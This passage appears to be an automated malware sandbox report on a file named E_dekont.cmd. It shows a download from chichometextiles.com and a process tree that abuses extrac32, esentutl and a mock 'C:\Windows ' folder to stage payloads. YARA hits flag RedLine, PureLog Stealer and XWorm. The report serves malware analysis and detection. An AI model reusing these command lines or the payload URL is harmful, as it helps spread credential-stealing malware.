                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 188.114.97.3 | 443 | 3840 | C:\Users\user\AppData\Local\Temp\x.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-01 07:23:16 UTC | 178 | OUT | GET /wp-admin/233_Jwsmvmdweya HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: chichometextiles.com
2024-11-01 07:23:17 UTC | 909 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2181536
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        last-modified: Tue, 29 Oct 2024 08:10:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        etag: "6720988c-2149a0"
                                                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dtFS6YweOKbLJrfi4l0daiNKInGWD7P21LvfUflM%2BQQUR%2FVC7cSoez0dXpwEp6rQgZcK%2Fsf2rVHKdJPzS9bUct7WBqNlGG%2FbXqQbAHohwpYnGHPBtuULhYw4IbQF6PF7n4jafqWdxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8dba23772e6e2cb2-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=792&delivery_rate=2373770&cwnd=251&unsent_bytes=0&cid=7345f70826a93939&ts=307&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: yb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19H
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XY
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb2
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: B286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0d



Target ID:1
Start time:03:23:12
Start date:01/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" "
Imagebase:0x7ff6b4330000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:03:23:12
Start date:01/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:03:23:12
Start date:01/11/2024
Path:C:\Windows\System32\extrac32.exe
Wow64 process (32bit):false
Commandline:extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:0x7ff7d9130000
File size:35'328 bytes
MD5 hash:41330D97BF17D07CD4308264F3032547
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:4
Start time:03:23:13
Start date:01/11/2024
Path:C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:0x400000
File size:1'051'648 bytes
MD5 hash:943266BC468E334D168F1F43831E8B7D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:18
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xa40000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:18
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:19
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:19
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:20
Start date:01/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o
Imagebase:0xbb0000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:03:23:20
Start date:01/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:03:23:20
Start date:01/11/2024
Path:C:\Users\Public\Libraries\wdmvmswJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wdmvmswJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:moderate
Has exited:false

Target ID:13
Start time:03:23:21
Start date:01/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Imagebase:0x10000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:03:23:24
Start date:01/11/2024
Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:0x400000
File size:1'290'240 bytes
MD5 hash:E270AE516A40989DA2942FC5476DC07D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Has exited:false

Target ID:15
Start time:03:23:24
Start date:01/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Imagebase:0x10000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

Target ID:16
Start time:03:23:24
Start date:01/11/2024
Path:C:\Windows\System32\alg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\alg.exe
Imagebase:0x140000000
File size:1'225'728 bytes
MD5 hash:C735DBF5B2240108A94A4D6FB664CF20
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:17
Start time:03:23:25
Start date:01/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase:0x10000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:03:23:25
Start date:01/11/2024
Path:C:\Users\Public\xpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase:0x890000
File size:18'944 bytes
MD5 hash:B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:03:23:25
Start date:01/11/2024
Path:C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:138'056 bytes
MD5 hash:BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:20
Start time:03:23:25
Start date:01/11/2024
Path:C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:174'408 bytes
MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:03:23:25
Start date:01/11/2024
Path:C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:154'952 bytes
MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:03:23:25
Start date:01/11/2024
Path:C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AppVClient.exe
Imagebase:0x140000000
File size:1'348'608 bytes
MD5 hash:967B8B62127D887C6080C553324E82B9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:03:23:28
Start date:01/11/2024
Path:C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\fxssvc.exe
Imagebase:0x140000000
File size:1'242'624 bytes
MD5 hash:43FB9AC7ED234297B5E93DB791F8F5A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:03:23:30
Start date:01/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:0x140000000
File size:2'354'176 bytes
MD5 hash:BE02F61FAC56C7D6563B746AF0B6AB07
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:27
Start time:03:23:30
Start date:01/11/2024
Path:C:\Users\Public\Libraries\Jwsmvmdw.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Imagebase:0x400000
File size:1'051'648 bytes
MD5 hash:943266BC468E334D168F1F43831E8B7D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Has exited:true

Target ID:28
Start time:03:23:30
Start date:01/11/2024
Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:0x140000000
File size:1'356'800 bytes
MD5 hash:6E2F1562B4D5A495EA5EE8392DBBC2E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:03:23:32
Start date:01/11/2024
Path:C:\Users\Public\Libraries\wdmvmswJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wdmvmswJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:31
Start time:03:23:36
Start date:01/11/2024
Path:C:\Windows\System32\msdtc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\msdtc.exe
Imagebase:0x140000000
File size:1'278'464 bytes
MD5 hash:7C2A7829306AFD07E0A7BEE6B5203F55
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:03:23:37
Start date:01/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Imagebase:0x10000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:03:23:38
Start date:01/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Imagebase:0x10000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:03:23:38
Start date:01/11/2024
Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase:0x140000000
File size:1'235'968 bytes
MD5 hash:083A7B3F7A1D4646EF789825E52C02AC
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

Target ID:35
Start time:03:23:39
Start date:01/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Imagebase:0x10000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:03:23:39
Start date:01/11/2024
Path:C:\Users\Public\Libraries\Jwsmvmdw.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Imagebase:0x400000
File size:1'051'648 bytes
MD5 hash:943266BC468E334D168F1F43831E8B7D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Has exited:true

Target ID:38
Start time:03:23:41
Start date:01/11/2024
Path:C:\Users\Public\Libraries\wdmvmswJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wdmvmswJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
